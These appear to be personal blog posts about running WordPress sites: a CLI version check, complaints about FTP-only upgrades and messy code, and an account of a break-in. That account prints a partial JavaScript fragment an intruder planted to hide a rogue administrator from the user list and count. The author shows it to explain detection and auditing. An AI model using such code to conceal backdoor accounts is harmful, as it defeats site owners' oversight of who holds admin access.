How to get WordPress’ version from the CLI

Have you ever been in that situation where you have CLI access to a wordpress site but not through the GUI? I had that experience recently and wanted to know which version of wordpress the person was using. Mainly, I wanted to see if they were keeping things up to date.

So with this handy one liner I found scouring through the web, you can do exactly that.

# find . -name 'version.php' -path '*wp-includes/*' -print -exec grep '$wp_version =' {} \; -exec echo '' \;
$wp_version = '4.1.1';

Upgrading WordPress

Maybe someone can help me out here. It seems to me that wordpress is lacking some support for upgrades with SSL. For example, I do not have FTP open on my web server and I have no plans to open it up in the future. I DO however support ftp over ssh also known as sftp. But when I click on the ‘automatically upgrade’ link in the plugins directory, here is the screen that I am greeted with.

Screen shot 2009-10-27 at 11.52.35 PM

First off, there are 2 things wrong with this screen.

1) As I mentioned before, it only supports ftp, not sftp.

2) Its not an option if there is only one choice! Just show the connection type as FTP.

Someone help me out here. If you have a better way of upgrading securely, I’d like to hear it.

WordPress Security Concern

I’m not sure if you’ve applied the latest updates for wordpress but I did last week. However, it appears that someone got in to one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3 as they were in when that was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit on the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peaking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

         for (var i = 0; i < tags.length; i++) {
                        var t=tags[i].innerHTML;
                        var h=tags[i];
                                s =(parseInt(t)-1)+s;
                                t = document.createTextNode(s);
                var arr=document.getElementsByTagName("ul");
                for(var i in arr) if(arr[i].className=="subsubsub"){
                        var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
                                var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");

Its not formatted the greatest, but basically, it hides the username from the list. Nice eh! Simply deleting this entry made the user show up in the user list where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had starting defacing the site or hiding other gems on there.


Hacking WordPress

I’ve been doing quite a bit of side work for friends and family putting together some low traffic ‘business card’ sites. I used to do a lot of custom programming for each of these where I would put up the site and then have a CMS on the back end so they could log in and update the content.

This worked out for a while and I had a pretty basic CMS built that I could plug in where needed. But, as with everything, the feature set that I needed kept growing and I was pretty short on time to implement the features that I needed.

To solve this, I started looking at the various blogging engines that were out there. The one that seemed the easiest to pick up, was pretty popular, and had a ton of plugins for the things that I was looking for was WordPress.

As a blog engine, it does great! It is actually what is powering the site that you are reading now. As a CMS, it does OK. I can create static pages, setup some assemlance of structure with sub pages and decent navigation. There are a ton of themes out there and a lot of people have tutorials that can tell you how to hack them up to make them look the way that you want. But there is one major thing that is bugging me. The code!

Seriously, have you looked at it? Maybe I’m anal retentive. But there is html and PHP mixed together all over the place. The code looks like it tries to implement some sort of MVC where the view is in the theme. But good god, do not go looking through that pile of poo.

Here is an example of what I am talking about:

    &lt;label&gt;&lt;?php _e('Username or E-mail:') ?&gt;&lt;br /&gt;
    &lt;input type="text" name="user_login" id="user_login" class="input" value="<?php echo attribute_escape(stripslashes($_POST['user_login'])); ?>" size="20" tabindex="10" /></label>
&lt;?php fake_do_action('lostpassword_form'); ?>
  <p class="submit">&lt;input type="submit" name="wp-submit" id="wp-submit" value="<?php _e('Get New Password'); ?>" tabindex="100" /&gt;</p>

I couldn’t even do that big of a snippet due to all the hell it causes when you post wordpress code on a wordpress site. But the <?php ?> tags are scattered all over the code base. Its a royal mess.

What WordPress needs to do is come up with some sort of code standard or guideline. Then reject anything that doesn’t meet that criteria that they have linked up on their site. This is a full review of all the plugins and themes that they have.

Yes, I’m serious about this!

It will take a long time to do. It will take a lot of man hours to complete. But in the long run, the code will be easier to maintain, extend, and quickly allow users to join the rank and file wordpress developers. It will also allow the hacks out there to become better programmers. Which is something that the code base desperately needs.